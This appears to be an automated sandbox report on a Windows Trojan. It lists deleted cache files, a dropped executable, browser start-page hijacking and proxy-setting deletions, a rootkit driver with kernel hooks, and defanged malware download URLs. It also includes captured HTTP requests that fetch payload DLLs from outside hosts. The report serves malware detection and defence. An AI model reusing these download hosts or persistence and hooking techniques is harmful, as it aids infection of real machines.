C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Yd__VnAFnBZBQiIS0sHoF6FGRC8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fc07_2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\fc07[1].swf (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Tsv1TyvAx4g5KyOkiAdSP1Stniw[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G6NPTRAV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\nearest[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\pppHBGDF.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KJGZP41Y.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q5LVK3U2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)

The process %original file name%.exe:2748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\AdN\ICZM.exe (1448729 bytes)
C:\Windows\System32\AdN\ÅäÖÃ.txt (21 bytes)

Registry activity

The process ICZM.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\ROkJy7CFKib]
"ErrorControl" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\System\CurrentControlSet\services\ROkJy7CFKib]
"Start" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\System\CurrentControlSet\services\ROkJy7CFKib]
"Devname" = "ROkJy7CFKib3"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\System\CurrentControlSet\services\ROkJy7CFKib]
"ImagePath" = "\DosDevices\C:\Windows\system32\581eb\CDClient_EX.sys"
"Type" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90117497_hao_pg"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90117497_hao_pg"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
89d67caa050c7cdcd0d25617570c5100 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\BqwFFmwC.dll
a17a5ec133da2bf1ab01bf0db5ca66b0 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\DAIwGxI.dll
bc5fb7fa78461d0d6c7834cdd89b0da2 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\tAKAXflCv.dll
a4ec69fef9db60ebb32fe7ac0e65c1c0 c:\Windows\System32\AdN\ICZM.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\581eb\aDVxAKMfkm1.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\581eb\aDVxAKMfkm1.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\581eb\aDVxAKMfkm1.sys" the Trojan controls operations with a system registry by installing the registry notifier.
The Trojan installs the following kernel-mode hooks:

ZwTerminateProcess

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 1015808 832000 5.54501 2554e9953e94316878f988dc38110d96
.rsrc 1019904 8192 5120 4.64099 444caef250ab8271ab9aac6f90911cac

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.58ad.cn/api/get?id=8618 119.97.143.20
hxxp://5636.ecoma.ourwebpic.com/d/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d/Client.dll
hxxp://5636.ecoma.ourwebpic.com/d2/TD/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://www.go890.com/d/Client.dll 203.130.60.58
hxxp://www.go890.com/d/CDClient.dll 203.130.60.58
hxxp://www.ip138.com/ 203.130.60.58
hxxp://dld.jxwan.com/d2/TD/x86.dll 203.130.60.58
online.clnds.com 58.49.58.20
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2017 04:52:28 GMT
Content-Length: 19152
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Mon, 25 Sep 2017 03:02:36 GMT
Accept-Ranges: bytes
ETag: "ccbfd8bdaa35d31:112f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 35631
X-Via: 1.1 PSbjwjBGP2ih137:2 (Cdn Cache Server V2.0), 1.1 dxin182:1 (Cdn Cache Server V2.0), 1.1 td48:7 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html>..<html>...<head>....<meta charset
="gb2312">....<meta name="mobile-agent" content="format=html5; u
rl=hXXp://m.ip138.com/">....<title>IP........--..............
.... | ............ | ............ | ........................</titl
e>....<meta name="keywords" content="ip,IP....,IP........,ip138"
/>....<meta name="description" content="ip,IP....,IP........,ip1
38"/>....<script type="text/javascript">.....<!--......if(
window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com
/';.....//-->....</script>....<style type="text/css">..
...html{color:#000;background:#FFF}body,div,dl,dt,dd,ul,ol,li,h1,h3,h3
,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th
,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0
}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var{
font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th{
text-align:left}h1,h3,h3,h4,h5,h6{font-size:100%;}q:before,q:after{con
tent:''}abbr,acronym{border:0;font-variant:normal}sup{vertical-align:t
ext-top}sub{vertical-align:text-bottom}input,textarea,select{font-fami
ly:inherit;font-size:inherit;font-weight:inherit;*font-size:100%}legen
d{color:#000}.....html{height:100%;}.....body{height:100%;font-size:14
px;font-family: Arial,Helvetica,"Microsoft Yahei";color:#333;}.....tab
le{table-layout:fixed;border-collapse: collapse;border-spacing: 0;marg
in: 0 auto;}.....input,button{font-family: Tahoma,Arial, Helvetica
<<< skipped >>>


GET /d/Client.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.go890.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2017 11:57:26 GMT
Server: kangle/2.9.6
Last-Modified: Thu, 05 Oct 2017 06:09:19 GMT
Content-Type: application/octet-stream
Content-Length: 916992
Age: 1
X-Via: 1.1 PShlamstdAMS1uv190:5 (Cdn Cache Server V2.0)
Connection: keep-alive
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
..............................@..........................0............
..................................,...R.......m.................... ..
......................................................................
..............CODE....................PEC2^O...... ....rsrc....0......
.".................. ....reloc....... ......................@.........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
................................................b.. .........c....X...
......b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i..
...8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?
..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<....
...].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K........ 
=`...9b..e.F^~..\...[..;GP.. ...........K.P.g~5.....\.Y;.|.Jz<.L..x
....}....A.[r..X...)J.Kc'1r]g....J......qf..D....vY...q.y....S.?..B.R.
.$..6..|.*(d0D=...Z.....RA.@u5D..2....._..p....2iU....k......fq..u
<<< skipped >>>


GET /api/get?id=8618 HTTP/1.1
Host: VVV.58ad.cn
Accept: text/html, */*
Accept-Encoding: gzip
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 
Server: nginx/1.4.4
Date: Fri, 06 Oct 2017 14:46:12 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
78d.............Xio.8../.<PtXW...N.........z1..K.$..h[n...W....9...
..Y.*.:X..."y...xV...C....F....F....H..Z.Y.>8r^........3n..../...!6
.c..y.6...q.x>.....y.y....C...E............T.[....fQI...q.k...Z.%..
K..5.o.z..e.....0.._a....H.Y.4...];!~.5.p}...#B.9.D..Qt......a.16...}7
.Y.0.D!.....:z.i...u.<.-.o...H...0.I.rEf...0`i8.i...Uz....l.X......
.RZ....7..|u....[5h...j...^..-....v....-k..S,..gV............E...?Lw..
....Z,H..hy.(E..J,..!.z4..]4...........8....;....b...!j;5.KV..Y..W.W2.
.\....qy).k.Qdi..cea[.Q...I.....p_d].......8y|Kx...7).6Q.....L.H .....
.....C..=.L.!...........Y..y....Nku.kZ...[...q.u....U{a.x...d?.._E;C.w
\...!.x../...j.x'.....%5?..............V. ....!..1q....De..........2..
.....{.v.:0...".C.*m..^.QZ.$Q.)."#c%.^#.C....d5.)......4?..J.m.c}..Q. 
.]...&....jE.....R......L.9..../1..Q.u.Pz.eH7...z..:..8.o".g.=T!.?.{..
.3...K.P.d"..ljQ.....o.c/.@Y.>g..)...y.:.\F.`E..fx...(...Q.N.]."..3
M.BC..0.Hu..%.,.2.V....*.K...rw......WM>I."d{.{#..b.. .......Kf....
e.l.................BA....u.)p...p.e.j."J.........8i...D..dZ..QQ...:5.
3T%..W;(.lU...\.T%K...Q\.....g...t."2. .v..9.3G..}{...3... :.YA..3W...
j$........qr.;..~C....F.!K....*29...^..$.L...Q..m(...=.........4. ."&w
TR....M)"....d.4E....%mH.....N..~.......B...L*gi.d)....:9.B...hH..uG..
]};o....&.*cV..7.e.q..H`<...b. .2.......'7..gc0.-.(-4O..ry..X......
....E.Y.....#X.(Q.mz..Ch..*X..H.......6..6M...@.m..n.......&e...:....S
..)..~..*.;.a.0...0.^......................8...C..r...B...Y...w...yA..
...q.P...hJ..r.&..B......P..B.kh...8.*..Xw...C.M..O..w.......R....
<<< skipped >>>


GET /d2/TD/x86.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2017 08:24:34 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 01:17:53 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
